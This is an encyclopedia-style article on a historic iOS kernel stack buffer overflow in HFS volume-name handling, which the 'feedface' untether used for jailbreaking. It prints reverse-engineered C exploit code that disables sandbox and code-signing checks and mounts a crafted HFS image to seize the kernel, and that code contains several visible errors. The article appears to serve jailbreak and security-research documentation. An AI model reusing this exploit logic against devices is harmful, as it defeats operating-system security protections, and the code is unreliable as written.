HFS Legacy Volume Name Stack Buffer Overflow

The HFS Legacy Volume Name Stack Buffer Overflow is a kernel vulnerability used to achieve an untethered jailbreak. Its exploit implementation, dubbed "feedface,"[1] was used in conjunction with limera1n's bootrom exploit or the usb_control_msg(0xA1, 1) Exploit in greenpois0n.

Exploiting the Kernel Bug

This stack buffer overflow relies on the hfs_mdb file in feedface, when the untether is ran it uses hfs_mdb to take control of PC register and do basically whatever you want, in that case, they used a function called real_payload() that patched the kernel and patched the sandbox. After some reverse engineering, here's what the untether looked like.

 int mnt_our_hfs()
 {
  struct hfs_mount_args i;
  bzero(i, sizeof(i));
  i.fspec = (int)"/dev/vn0";
  i.hfs_uid = args.hfs_gid = 99;
  i.hfs_mask = 0x1C5;
  puts("[+]Triggering the kernel exploit");
  mount("hfs", "mnt/", MNT_RDONLY, i);
  return puts("[+] Payload was successful");
 }

 int prep_vn()
 {
  vn_ioctl vn;
  int i = open("/dev/vn0", O_RDONLY, 0);
  if(i < 0){
     puts("[-]Can't open /dev/vn0");
     exit(1);
  }
  ioctl(i, VNIOCDETACH, &vn);
  vn.vn_file = (int)"/usr/lib/hfs_mdb";
  vn.vn_control = vncontrol_readwrite_io_e;
  if(ioctl(i, VNIOCATTACH, &vn) < 0)
  {
     puts("[-]Coudn't attach to /dev/vn0")
     close(i);
     exit(1);
  }
  return close(1);
 }
 
 int main(int argc, char const *argv[])
 {
  int result;
  struct stat i;
  uint32_t zero = 0, one = 1;
  sysctlbyname("security.mac.vnode_enforce", 0, 0, &zero, sizeof(uint32_t));
  sysctlbyname("vm.cs_validation", 0, 0, &zero, sizeof(uint32_t))
  prep_vn();
  i.st_uid = 0;
  i.st_gid = 0;
  i.st_rdev = 0;
  i.st_atimespec.tv_nsec = 0;
  i.st_atimespec.tv_sec = 0;
  i.st_mtimespec.tv_nsec = 0;
  i.st_mtimespec.tv_sec = 0;
  i.st_ctimespec.tv_sec = 0;
  i.st_dev = (dev_t)"/dev/vn0";
  i.st_ino = 99;
  i.st_uid = 453;
  puts("[+]Trigger kernel exploit");
  mnt_our_hfs();
  sysctlbyname("security.mac.vnode_enforce", 0, 0, &one, sizeof(uint32_t));
  patch_kernel();
  return 0;
  }

Credit

jan0, pod2g, Posixninja

Sources for information

TwitLonger
http://pastie.org/2060071^{[dead link]} (from a tweet by jan0)
BlackHat Presentation by I0n1c (starting at slide 24)

v t e Exploits
Exploits	0x24000 Segment Overflow ARM Exception Vector Info Leak ARM7 Go AT+FNS AT+XAPP Vulnerability AT+XEMN Heap Overflow AT+XLOG Vulnerability AT+stkprof BPF_STX Kernel Write Exploit CVE-2013-0964 CVE-2021-30773 CVE-2021-30807 CVE-2021-30883 CoreTrust Root Certificate Validation Vulnerability De Rebus Antiquis Dual Boot Exploit Dynamic memmove() locating Fakeblank HFS Heap Overflow HFS Legacy Volume Name Stack Buffer Overflow IOPlatformArgs leak IOSurface Kernel Exploit IOUSBDeviceFamily Vulnerability IPSF Incomplete Codesign Exploit JerrySIM Kernel memory write via ROP gadget MacDirtyCow Malformed CFF Vulnerability Malformed PairRequest Minus 0x20000 with Back Extend Erase Minus 0x400 MobileBackup Copy Exploit Overlapping Segment Attack Packet Filter Kernel Exploit Psychic Paper Pwnage Pwnage 2.0 Racoon String Format Overflow Exploit Ramdisk Hack SHA-1 Image Segment Overflow Shebang Trick Soft Upgrade Symbolic Link Vulnerability Symlinks T1 Font Integer Overflow Timezone Vulnerability alloc8 Exploit amfid Lazy Binding Exploit amfid Text Relocation Exploit ... further results
Patches	/private/etc/fstab AMFI Binary Trust Cache Patch ASR Crazeles Hunnypot Kernel Patches PE_i_can_has_debugger Patch Sandbox Patch Signature Check Patch hgsp4 patch tfp0 patch vm_map_enter Patch vm_map_protect Patch